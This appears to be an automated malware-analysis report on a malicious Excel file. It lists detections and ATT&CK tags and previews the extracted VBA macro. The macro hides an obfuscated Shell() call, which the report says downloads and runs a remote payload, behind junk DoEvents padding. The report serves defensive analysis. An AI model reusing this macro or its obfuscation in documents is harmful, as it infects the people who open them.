MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. The reconstructed string 'pvkwd#kwws=__m1ps_' is likely part of a command to download and execute a secondary payload. The ClamAV detection further confirms the malicious nature of this Excel file.
Heuristics 3
-
ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 62874 bytes |
SHA-256: ad0f6aaded75ff4506b3fd965efbfdb69da4a7e87b9422ef7d1760d4b6f9846f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub MPPP()
f6 = yM2OukrFZ("pvkwd#kwws=__m1ps_", "3")
Shell (f6 + yM2OukrFZ("pi9qgmmu", "3"))
End Sub
Private Sub RSQVGNUlLLcRTLlNsqYM()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
End Sub
Private Sub VTNgdzjuzwH()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
End Sub
Private Sub YBdNeikcBeItpdyoftD()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
End Sub
Public Sub qLMQgbETnH()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
End Sub
Private Function CZYAizlpOp()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents
Next gCbSObsGcPZwrUQDY
End Function
Private Function PPNSqxEjvvKORJix()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents
Next gCbSObsGcPZwrUQDY
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
End Function
Private Sub QfgpNHlnTatBrQRSQ()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents
Next gCbSObsGcPZwrUQDY
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
Dim lLLcRTLlNsqYMhYOcnVU As Integer
lLLcRTLlNsqYMhYOcnVU = 10
Do While lLLcRTLlNsqYMhYOcnVU < 35
DoEvents: lLLcRTLlNsqYMhYOcnVU = lLLcRTLlNsqYMhYOcnVU + 1
Loop
End Sub
Private Function EhAgDViVTNgdzj()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To 7
DoEvents
Next gCbSObsGcPZwrUQDY
If "fHLaVFSssTcoQkPnF" = "FQKdMjSejgr" Then End
Dim lLLcRTLlNsqYMhYOcnVU As Integer
lLLcRTLlNsqYMhYOcnVU = 10
Do While lLLcRTLlNsqYMhYOcnVU < 35
DoEvents: lLLcRTLlNsqYMhYOcnVU = lLLcRTLlNsqYMhYOcnVU + 1
Loop
Dim ZavwFeKoDkqJRHnij As String
ZavwFeKoDkqJRHnij = "3217"
End Function
Private Sub PYBdNeikcBeItpdyoftD()
Dim nVUIIksEhA As Integer
For nVUIIksEhA = 2 To 8
DoEvents
Next nVUIIksEhA
Dim FeKoDkqJRHnijh As String
FeKoDkqJRHnijh = "1825"
Dim mIVkQiUZymkewtPmK As Integer
mIVkQiUZymkewtPmK = 11
Do While mIVkQiUZymkewtPmK < 38
DoEvents: mIVkQiUZymkewtPmK = mIVkQiUZymkewtPmK + 1
Loop
If "yzxCnhoRfeuyB" = "RhaJrtOrvJToCp" Then End
Dim gCbSObsGcPZwrUQDY As Integer
For gCbSObsGcPZwrUQDY = 2 To
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.